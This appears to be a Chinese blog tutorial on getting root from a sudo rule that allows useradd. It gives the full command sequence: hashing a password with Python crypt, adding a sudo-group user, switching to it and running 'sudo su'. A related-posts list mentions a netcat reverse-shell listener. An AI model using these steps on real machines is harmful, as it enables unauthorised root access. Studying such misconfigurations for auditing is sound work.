2. 程式人生 > 其它 >sudo useradd提權

sudo useradd提權

阿新 發佈:2021-12-16

sudo配合useradd命令也是可以用來提權的。整體思路是新增一個組為sudo的使用者,然後用這個新使用者執行sudo su到root

首先看下useradd新增使用者的幾個必要條件,指定組,指定密碼,useradd有這麼幾個引數可以使用

Usage: useradd [options] LOGIN
       useradd -D
       useradd -D [options]

Options:
  -g, --gid GROUP               name or ID of the primary group of the new account
  -m, --create-home             create the user'
 
s home directory
  -p, --password PASSWORD       encrypted password of the new account

-g指定組,-m指定home目錄,登入需要一個預設的home目錄。-p指定密碼,這裡的密碼需要encrypted加密過。

步驟一:生成使用者密碼的密文,這裡用python的crypt庫來實現,這裡123456是密碼,hh隨便指定,相當於鹽

test@test:/etc/ppp$ python                                                                                                                                                                                                                                                                                                                                                                               
Python 
 
2.7.16 (default, Oct 10 2019, 22:02:15)                                                                                                                                                            
[GCC 8.3.0] on linux2                                                                                                                                                                                     
Type 
 
"help", "copyright", "credits" or "license" for more information.                                                                                                                                    
>>> import crypt                                                                                                                                                                                          
import crypt                                                                                                                                                                                              
>>> crypt.crypt("123456","hh")                                                                                                                                                                            
crypt.crypt("123456","hh")                                                                                                                                                                                
'hhYwUmQRSuCZ.'                                                                                                                                                                                           
>>> exit                                                                                                                                                                                                  
exit                                                                                                                                                                                                      
Use exit() or Ctrl-D (i.e. EOF) to exit                                                                                                                                                                   
>>> exit()                                                                                                                                                                                                
exit()                                                                                                                                                                                                    
test@test:/etc/ppp$

步驟二:利用上面生成的密碼密文配合sudo useradd加一個擁有sudo組的使用者,此時就添加了一個test2的使用者,密碼是123456

test@test:/etc/ppp$ sudo /usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2

步驟三:跳到test2使用者

test@test:/etc/ppp$ su test2                                                                                                                                                                                
su test2                                                                                                                                                                                                  
Password: 123456                                                                                                                                                                                          
                                                                                                                                                                                                          
$ id                                                                                                                                                                                                      
id                                                                                                                                                                                                        
uid=1003(test2) gid=27(sudo) groups=27(sudo)

步驟四:跳到root使用者

$ sudo su                                                                                                                                                                                                 
sudo su                                                                                                                                                                                                   
                                                                                                                                                                                                          
We trust you have received the usual lecture from the local System                                                                                                                                        
Administrator. It usually boils down to these three things:                                                                                                                                               
                                                                                                                                                                                                          
    #1) Respect the privacy of others.                                                                                                                                                                    
    #2) Think before you type.                                                                                                                                                                            
    #3) With great power comes great responsibility.                                                                                                                                                      
                                                                                                                                                                                                          
[sudo] password for test2: 123456
root@test:/etc/ppp#

提權到root

相關推薦

sudo useradd

sudo配合useradd命令也是可以用來的。整體思路是新增一個組為sudo的使用者,然後用這個新使用者執行sudo su到root

第十三章 使用者組的管理,使用者許可權,sudo

使用者組的管理 基本組-g#每個使用者只能有一個基本組 附加組-G#使用者可以有多個附加組​跟組相關的檔案 [root@lxy ~]# ll/etc/group-rw-r--r--. 1 root root 771 Dec 15 00:58 /etc/group[root@lxy ~]# ll /etc/g

20200811記錄:ansible sudo,劇本,變數資訊

--------- 1 案例1:配置sudo許可權 1.1 問題 本案例要求使用sudo提升普通使用者的許可權,要求如下:

su使用者身份切換與sudo

su使用者切換與sudo提權 因為root使用者的許可權太大,容易對系統造成強大破壞,安全風險極高,所以通常情況下生產環境的伺服器對外都是禁止root使用者直接登入的,通常都是使用普通使用者來管理系統,為了讓普通使用

Linux曝出Sudo漏洞 任意使用者亦可執行root命令

作為 Linux 中最常使用的重要實用程式之一,Sudo 幾乎安裝在每一款 UNIX 和 Linux 發行版上,以便使用者呼叫和實施核心命令。 然而近期曝出的一個提權漏洞,卻直指 sudo 的一個安全策略隱患 —— 即便配置中明確不允

-linux-su切換使用者與sudo

一 介紹 ​ 因為root使用者的許可權太大,破壞力太強,安全風險極高,所以通常情況下公司的伺服器對外都是禁止root使用者直接登入,而運維組的小夥伴通常使用的都是普通使用者,但是運維組內的小夥伴們在進行日常運維

Linux使用者組免密sudo

Linux使用者組免密sudo提權建立使用者組及免密許可權配置ssh.ssh檔案許可權建立使用者組及免密許可權建立使用者組duanyiwen,指定gid為1000groupadd -g 1000 duanyiwen將使用者dyiwen加入duanyiwen使用者組usermod -

Linux sudo 之軟連結攻擊

軟連結提權的原理 低許可權使用者能夠以 root 使用者的許可權執行某個指令碼,該指令碼中又使用到了諸如 chown 等命令修改檔案的許可權,且該檔案又能夠被低許可權的使用者所修改。因此低許可權的使用者可以刪除該檔

sudo

關於sudo sudo是linux系統管理指令,是允許系統管理員讓普通使用者執行一些或者全部的root命令的一個工具,如halt,reboot,su等等。換句話說通過此命令可以讓非root的使用者執行只有root才有許可權執行的命令。

CVE-2019-13272 核心漏洞手記

poc: github kernel-bug-summary: blog 中文簡述:嘶吼 CVE: CVE-2019-13272 要點 簡單總結:即利用併發條件下,子程式在獲取父程式的同時,父程式的憑證得以切換至root來使得子程式同時獲得root許可權。

windows

schtasks命令使用 schtasks命令比at命令更靈活。而且在Windows Vista、Windows Server 2008及之後版本的作業系統已經棄用at命令。建立一個名稱為\"test\"的計劃任務,啟動許可權為system

[總結]Windows總結

0x01 簡介 可分為縱向與橫向:縱向:低許可權角色獲得高許可權角色的許可權;橫向:獲取同級別角色的許可權。

Kali虛擬機器利用msf17-010執行RCE(針對Windows Server 2008以及2003)

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2

記一次WindowsServer2012 - 爛土豆

Emm Shell都好久了 操 最近好鐵鐵又喊我來 因為自己不怎麼會,最近學了一點 放了學就回家抓緊吃完飯開始

MS16-032 windows本地

試用系統:Tested on x32 Win7,x64 Win8,x64 2k12R2 powershell指令碼: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Windows Win32k 許可權漏洞

0X01  簡介:   本篇文章將集中介紹兩個利用windows win32k服務的漏洞。

Mysql UDF方法

0x01 UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫,就像呼叫本機函式一樣。

metaspolit下UAC以及日誌清除

在獲得webshell時但許可權不夠大,這時候為了完全獲得受害者機器的許可權,使用msf進行後滲透。

(CVE-2015-1328)Ubuntu Linux核心本地漏洞

(CVE-2015-1328)Ubuntu Linux核心本地漏洞 一、漏洞簡介 本地普通使用者可以利用該漏洞在敏感系統目錄中建立新檔案或讀取敏感檔案內容,從而提升到管理員許可權。

以及反彈shell一些方法

以及反彈shell netcat反彈shell kali中使用nc(netcat)進行監聽 用法 : nv -lvvp 2333(埠號)